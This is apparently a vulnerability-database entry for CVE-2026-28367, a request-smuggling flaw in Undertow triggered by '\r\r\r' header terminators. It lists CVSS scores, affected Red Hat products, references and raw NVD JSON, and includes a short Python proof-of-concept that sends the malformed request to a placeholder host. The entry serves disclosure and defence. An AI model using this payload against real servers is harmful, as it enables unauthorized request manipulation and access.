CVE-2026-28367

Description

A flaw was found in Undertow. A remote attacker can exploit this vulnerability by sending `\r\r\r` as a header block terminator. This can be used for request smuggling with certain proxy servers, such as older versions of Apache Traffic Server and Google Cloud Classic Application Load Balancer, potentially leading to unauthorized access or manipulation of web requests.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:redhat:build_of_apache_camel_-_hawtio:4.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:redhat:build_of_apache_camel_for_spring_boot:4.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:redhat:data_grid:8.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:redhat:fuse:7.0.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0.0:*:*:*:*:*:*:* - VULNERABLE

Undertow (具体受影响版本请参考官方安全公告)

Apache Traffic Server (旧版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# Target configuration
host = "target.example.com"
port = 80

# Construct malicious request with \r\r\r terminator
# This attempts to exploit the header parsing flaw in Undertow
payload = (
    "POST / HTTP/1.1\r\n"
    "Host: " + host + "\r\n"
    "Content-Length: 10\r\n"
    "\r\r\r"  # Sending \r\r\r instead of \r\n\r\n
    "GARBAGEDATA"
)

print("[*] Sending malicious payload to " + host)

# Create socket connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(payload.encode())

# Receive response
response = s.recv(4096)
print("[+] Response received:")
print(response.decode())

s.close()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-28367
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-28367
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-28367/
[4] VulDB https://vuldb.com/cve/CVE-2026-28367
[5] https://access.redhat.com/security/cve/CVE-2026-28367
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2443260

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-28367", "sourceIdentifier": "[email protected]", "published": "2026-03-27T17:16:27.750", "lastModified": "2026-04-10T14:22:53.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Undertow. A remote attacker can exploit this vulnerability by sending `\\r\\r\\r` as a header block terminator. This can be used for request smuggling with certain proxy servers, such as older versions of Apache Traffic Server and Google Cloud Classic Application Load Balancer, potentially leading to unauthorized access or manipulation of web requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-444"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_apache_camel_-_hawtio:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "19B253BB-F6CE-400B-87EF-1DF1AFFC2445"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_apache_camel_for_spring_boot:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "06A6AC25-2E2D-4359-A806-CC0355513A20"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:data_grid:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "7095200A-4DAC-4433-99E8-86CA88E1E4D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:fuse:7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "AAD91726-93D9-4230-BF69-6A79B58E09E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "72A54BDA-311C-413B-8E4D-388AD65A170A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "0D8BC03A-4198-4488-946B-3F6B43962942"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform_expansion_pack:-:*:*:*:*:*:*:*", "matchCriteriaId": "0A24CBFB-4900-47A5-88D2-A44C929603DC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:process_automation:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "20A6B40D-F991-4712-8E30-5FE008505CB7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "9EFEC7CA-8DDA-48A6-A7B6-1F1D14792890"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:undertow:-:*:*:*:*:*:*:*", "matchCriteriaId": "8190B427-8350-43AE-8F54-6A40B701C95E"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-28367", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443260", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}